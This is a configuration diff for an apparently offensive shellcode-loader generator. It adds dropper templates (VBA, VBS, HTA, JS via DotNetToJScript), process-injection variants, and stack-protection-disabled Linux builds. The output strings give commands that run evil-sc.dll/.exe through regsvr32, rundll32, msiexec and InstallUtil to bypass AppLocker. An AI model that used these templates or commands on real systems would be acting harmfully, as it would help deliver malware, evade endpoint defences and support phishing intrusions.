--- a/core/config/default.ini
+++ b/core/config/default.ini
@@ -58,7 +58,10 @@ function_name = ####FUNCTION_NAME####
 entry_args = ####ENTRY_ARGS####
 shellcode_variable = encoded
 strong_name_required = //####STRONG_NAME_REQUIRED####
-
+vba_auto_open = ####VBA_AUTO_OPEN####
+vba_file_open = ####VBA_FILE_OPEN####
+vba_required_custom_part = ####VBA_REQUIRED_CUSTOM_PART####
+dotnet2js_version = //####DOTNET2JS_VERSION####
 
 ; the compiler_argument should not define .DLL compilation options (e.g /target:library)
 ; It's already defined using the output_format parameters
@@ -66,7 +69,7 @@ strong_name_required = //####STRONG_NAME_REQUIRED####
 [DEBUG]
 encoders = False
 shellcode = False
-compiler = False
+compiler = True
 evasion = False
 syscalls = False
 
@@ -80,6 +83,11 @@ expected_format = RAW_BIN
 output_format = .exe
 
 [windows_cpp:CreateRemoteThread.dll]
+expected_format = RAW_BIN
+output_format = .dll
+custom_output = Run the dll using one of following commands: \nx86:\nC:\Windows\SysWOW64\msiexec.exe /y evil-sc.dll\nC:\Windows\SysWOW64\msiexec.exe /z evil-sc.dll\nC:\Windows\SysWOW64\regsvr32.exe /s /u evil-sc.dll\nC:\Windows\SysWOW64\regsvr32.exe /s evil-sc.dll\nC:\Windows\SysWOW64\rundll32.exe evil-sc.dll,EntryPoint\nx64:\nC:\Windows\System32\msiexec.exe /y evil-sc.dll\nC:\Windows\System32\msiexec.exe /z evil-sc.dll\nC:\Windows\System32\regsvr32.exe /s /u evil-sc.dll\nC:\Windows\System32\regsvr32.exe /s evil-sc.dll\nC:\Windows\System32\rundll32.exe evil-sc.dll,EntryPoint
+
+[windows_cpp:LocalQueueAPC.dll]
 expected_format = RAW_BIN
 output_format = .dll
 custom_output = Run the dll using one of following commands: \nx86:\nC:\Windows\SysWOW64\msiexec.exe /y evil-sc.dll\nC:\Windows\SysWOW64\msiexec.exe /z evil-sc.dll\nC:\Windows\SysWOW64\regsvr32.exe /s /u evil-sc.dll\nC:\Windows\SysWOW64\regsvr32.exe /s evil-sc.dll\nC:\Windows\SysWOW64\rundll32.exe evil-sc.dll,EntryPoint\nx64:\nC:\Windows\System32\msiexec.exe /y evil-sc.dll\nC:\Windows\System32\msiexec.exe /z evil-sc.dll\nC:\Windows\System32\regsvr32.exe /s /u evil-sc.dll\nC:\Windows\System32\regsvr32.exe /s evil-sc.dll\nC:\Windows\System32\rundll32.exe evil-sc.dll,EntryPoint
@@ -101,6 +109,13 @@ expected_format = RAW_BIN
 output_format = .dll
 compiler_args = -r:System.Configuration.Install
 custom_output = Run it using InstallUtil (AppLocker Bypass).\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.dll\nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.dll
+
+[windows_cs:InstallUtil]
+expected_format = RAW_BIN
+output_format = .exe
+compiler_args = -r:System.Configuration.Install
+custom_output = Run it using InstallUtil (AppLocker Bypass).\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe\nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe
+
 
 [windows_cs:InstallUtilHollow]
 expected_format = RAW_BIN
@@ -135,6 +150,11 @@ expected_format = TEXT
 output_format = .exe
 compiler_args = -r:core/templates/headers/System.Management.Automation.dll
 
+[windows_cs:htb]
+expected_format = RAW_BIN
+output_format = .exe
+compiler_args = -r:System.Configuration.Install -r:core/templates/headers/System.Management.Automation.dll
+
 [windows_cs:MockingJay]
 expected_format = RAW_BIN
 output_format = .exe
@@ -164,10 +184,6 @@ output_format = .dll
 compiler_args = -r:System.EnterpriseServices
 custom_output = Run the dll using one of following commands: \nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U evil-sc.dll\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U evil-sc.dll
 
-
-[windows_js:VenomaToJs]
-expected_format = RAW_BIN
-output_format = .js
 
 [windows_pwsh:DelegateType]
 expected_format = RAW_BIN
@@ -225,10 +241,15 @@ output_format = .vba
 expected_format = RAW_BIN
 output_format = .vba
 
-[windows_vba:WmiCmd]
+[windows_vba:WmiExec]
 expected_format = TEXT
 output_format = .vba
 custom_output = This template uses WMI dechaining, so still use x64 shellcode even if you are targeting x86 word!
+
+[windows_vba:DllExecDroper]
+expected_format = DOTNET_DLL,NATIVE_DLL
+output_format = .vba
+custom_output = This template uses a custom XML part to drop the shellcode.\nYou should import this XML file into your Office document.\nSee this link for more information: https://red.infiltr8.io/redteam/delivery/phishing/phishing-with-ms-office/ms-office-custom-xml-parts
 
 [windows_aspx:NtMapViewOfSection]
 expected_format = RAW_BIN
@@ -247,6 +268,10 @@ expected_format = RAW_BIN
 output_format = .elf
 compiler_args = -z execstack -fno-stack-protector
 
+[linux:osep]
+expected_format = RAW_BIN
+output_format = .elf
+compiler_args = -z execstack -fno-stack-protector
 
 [linux:LD_LIBRARY_PATH.so]
 expected_format = RAW_BIN
@@ -257,3 +282,57 @@ compiler_args = -z execstack
 expected_format = RAW_BIN
 output_format = .so
 compiler_args = -z execstack -Wall
+
+
+[windows_vbs:WmiExec]
+expected_format = TEXT
+output_format = .vbs
+custom_output = This template uses WMI dechaining, so still use x64 shellcode even if you are targeting x86 word!
+
+[windows_vbs:CreateLocalThread]
+expected_format = RAW_BIN
+output_format = .vbs
+
+[windows_vbs:CreateRemoteThread]
+expected_format = RAW_BIN
+output_format = .vbs
+
+[windows_hta:VenomaToJs]
+expected_format = RAW_BIN
+output_format = .hta
+
+[windows_hta:WmiExec]
+expected_format = TEXT
+output_format = .hta
+custom_output = This template uses WMI dechaining, so still use x64 shellcode even if you are targeting x86 word!
+
+[windows_hta:VortexShooter]
+expected_format = RAW_BIN
+output_format = .hta
+custom_output = This template use DotNetToJScript with the DInvokeHollow windows_cs template to generate the payload. \nAnd encrypt the shellcode with Vortex.
+
+
+[windows_js:SmallShooter]
+expected_format = RAW_BIN
+output_format = .js
+custom_output = This template use DotNetToJScript with the DInvokeHollow windows_cs template to generate the payload.
+
+[windows_hta:SmallShooter]
+expected_format = RAW_BIN
+output_format = .hta
+custom_output = This template use DotNetToJScript with the DInvokeHollow windows_cs template to generate the payload.
+
+[windows_js:VortexShooter]
+expected_format = RAW_BIN
+output_format = .js
+custom_output = This template use DotNetToJScript with the DInvokeHollow windows_cs template to generate the payload. \nAnd encrypt the shellcode with Vortex.
+
+[windows_js:PowerShooter]
+expected_format = TEXT
+output_format = .js
+custom_output = This template use DotNetToJScript with the PowerSpace windows_cs template to generate the payload. \nAnd encrypt the shellcode with Vortex.
+
+[windows_hta:PowerShooter]
+expected_format = TEXT
+output_format = .hta
+custom_output = This template use DotNetToJScript with the PowerSpace windows_cs template to generate the payload. \nAnd encrypt the shellcode with Vortex.
